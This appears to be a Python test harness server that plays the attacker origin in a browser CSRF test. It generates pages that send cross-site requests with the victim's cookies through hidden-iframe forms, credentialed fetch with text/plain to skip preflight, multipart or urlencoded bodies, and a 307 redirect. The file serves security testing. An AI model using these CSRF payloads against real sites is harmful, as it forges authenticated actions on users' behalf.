#!/usr/bin/env python3
"""
Attacker origin HTTP server for the D8AD-CAN-004 browser CSRF harness.

Serves three things on 127.0.0.1:PORT (bound to loopback so it is
reachable via Chromium --host-resolver-rules mapping of attacker
hostnames to 127.0.0.1):

  GET  /attack?<params>   -> an HTML page that performs one CSRF vector
                             against the app target and POSTs the
                             JS-observable outcome to /result.
  POST /redirect307?to=URL-> 307 redirect to <URL>, preserving method+body
                             (the redirect-vector test).
  POST /result             -> stores the page JS's observation.
  GET  /results            -> returns all stored observations as JSON.

The browser's actual outgoing Cookie header and the real HTTP response
status are captured independently by the Playwright driver via network
events (the ground truth); this server only relays what page-side JS can
see (which for cross-origin opaque responses is necessarily limited).

The server is deliberately host-agnostic: the same instance serves both
the same-site-sibling attacker hostname and the cross-site attacker
hostname. Which "site" the browser considers the page to be on is
determined purely by the URL the browser navigated to (and the Public
Suffix List), not by this server.
"""
import json
import sys
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

RESULTS = []


class Handler(BaseHTTPRequestHandler):
    def log_message(self, fmt, *args):  # silence default logging
        pass

    def _send(self, status, body=b"", ctype="text/html; charset=utf-8"):
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        if body:
            self.wfile.write(body)

    def do_GET(self):
        from urllib.parse import urlparse, parse_qs
        url = urlparse(self.path)
        if url.path == "/attack":
            self._send(200, self._attack_page(parse_qs(url.query)).encode())
            return
        if url.path == "/results":
            self._send(200, json.dumps(RESULTS).encode(),
                       "application/json")
            return
        if url.path == "/healthz":
            self._send(200, b"ok", "text/plain")
            return
        self._send(404, b"not found", "text/plain")

    def do_POST(self):
        from urllib.parse import urlparse, parse_qs
        url = urlparse(self.path)
        length = int(self.headers.get("Content-Length", "0") or "0")
        body = self.rfile.read(length) if length else b""
        if url.path == "/redirect307":
            qs = parse_qs(url.query)
            to = qs.get("to", [None])[0]
            if not to:
                self._send(400, b"missing to", "text/plain"); return
            # 307 preserves method and request body across the redirect.
            self.send_response(307)
            self.send_header("Location", to)
            self.send_header("Content-Length", "0")
            self.end_headers()
            return
        if url.path == "/result":
            try:
                RESULTS.append(json.loads(body.decode() or "{}"))
            except Exception as e:
                RESULTS.append({"error": str(e), "raw": body.decode(errors="replace")})
            self._send(200, b"ok", "text/plain")
            return
        self._send(404, b"not found", "text/plain")

    # ----- attack page generator -----
    def _attack_page(self, q):
        target = q.get("target", [""])[0]
        method = q.get("method", ["POST"])[0].upper()
        mode = q.get("mode", ["fetch-json"])[0]
        ctype = q.get("ctype", ["application/json"])[0]
        body = q.get("body", ["{}"])[0]
        label = q.get("label", [""])[0]
        # The page performs exactly one attack, then signals completion by
        # POSTing the JS-observable result to /result on this same attacker
        # origin (same-origin -> readable). The Playwright driver waits for
        # that POST. Ground-truth cookie attachment + real status come from
        # the driver's network listeners, not from this JS.
        js = """
        <script>
        (async function () {
          const TARGET = %s;
          const METHOD = %s;
          const MODE = %s;
          const CTYPE = %s;
          const BODY = %s;
          const LABEL = %s;
          const report = (obj) => fetch('/result', {method:'POST',
              headers:{'Content-Type':'application/json'},
              body: JSON.stringify({label:LABEL, ...obj})}).catch(()=>{});
          try {
            if (MODE === 'form-submit') {
              // Build a REAL form (real urlencoded/text-plain/multipart
              // body generated by the browser) targeting a hidden iframe
              // so the top page survives. One field per JSON key carries
              // the payload values; the body is NOT valid JSON.
              const obj = JSON.parse(BODY);
              const iframe = document.createElement('iframe');
              iframe.name = 'csrfframe_' + Math.floor(Math.random()*1e9);
              iframe.style.display = 'none';
              document.body.appendChild(iframe);
              const form = document.createElement('form');
              form.method = METHOD;
              form.action = TARGET;
              form.target = iframe.name;
              form.enctype = CTYPE; // urlencoded | text/plain | multipart/form-data
              for (const k in obj) {
                const i = document.createElement('input');
                i.name = k; i.value = String(obj[k]);
                form.appendChild(i);
              }
              document.body.appendChild(form);
              form.submit();
              await report({settled:'submitted', note:'real form submitted to hidden iframe'});
              return;
            }
            const init = {method: METHOD, credentials: 'include', mode: 'cors'};
            if (MODE === 'redirect-307') {
              // Point at our own 307 redirector; the browser follows it
              // to TARGET preserving method+body+Content-Type.
              const red = '/redirect307?to=' + encodeURIComponent(TARGET);
              init.headers = {'Content-Type': CTYPE};
              init.body = BODY; // JSON string -> parses as JSON server-side
              const r = await fetch(red, init);
              await report({settled:'fulfilled', status:r.status, type:r.type,
                            redirected:r.redirected, url:r.url});
              return;
            }
            if (MODE === 'fetch-urlencoded') {
              // REAL urlencoded body from the JSON fields -- NOT valid JSON.
              const obj = JSON.parse(BODY);
              init.headers = {'Content-Type': 'application/x-www-form-urlencoded'};
              init.body = new URLSearchParams(obj).toString();
            } else if (MODE === 'fetch-multipart') {
              // REAL multipart/form-data body -- NOT valid JSON.
              const obj = JSON.parse(BODY);
              const fd = new FormData();
              for (const k in obj) fd.append(k, String(obj[k]));
              init.body = fd; // Content-Type auto-set w/ boundary
            } else {
              // fetch-json (application/json) and fetch-text-plain both
              // carry the JSON string as the body. application/json is NOT
              // a CORS-safelisted content-type -> triggers a preflight;
              // text/plain IS safelisted -> simple request, no preflight,
              // and the server's req.json() parses the JSON body regardless
              // of Content-Type.
              init.headers = {'Content-Type': CTYPE};
              init.body = BODY;
            }
            const r = await fetch(TARGET, init);
            await report({settled:'fulfilled', status:r.status, type:r.type,
                          redirected:r.redirected, url:r.url});
          } catch (e) {
            await report({settled:'rejected', error:String(e)});
          }
        })();
        </script>
        """
        def j(v): return json.dumps(v)
        page = "<!doctype html><html><head><title>attacker</title></head><body>" \
               "<h1>attacker page</h1>" + js % (
            j(target), j(method), j(mode), j(ctype), j(body), j(label)
        ) + "</body></html>"
        return page


def main():
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 4000
    srv = ThreadingHTTPServer(("127.0.0.1", port), Handler)
    print(f"attacker server on 127.0.0.1:{port}", flush=True)
    srv.serve_forever()


if __name__ == "__main__":
    main()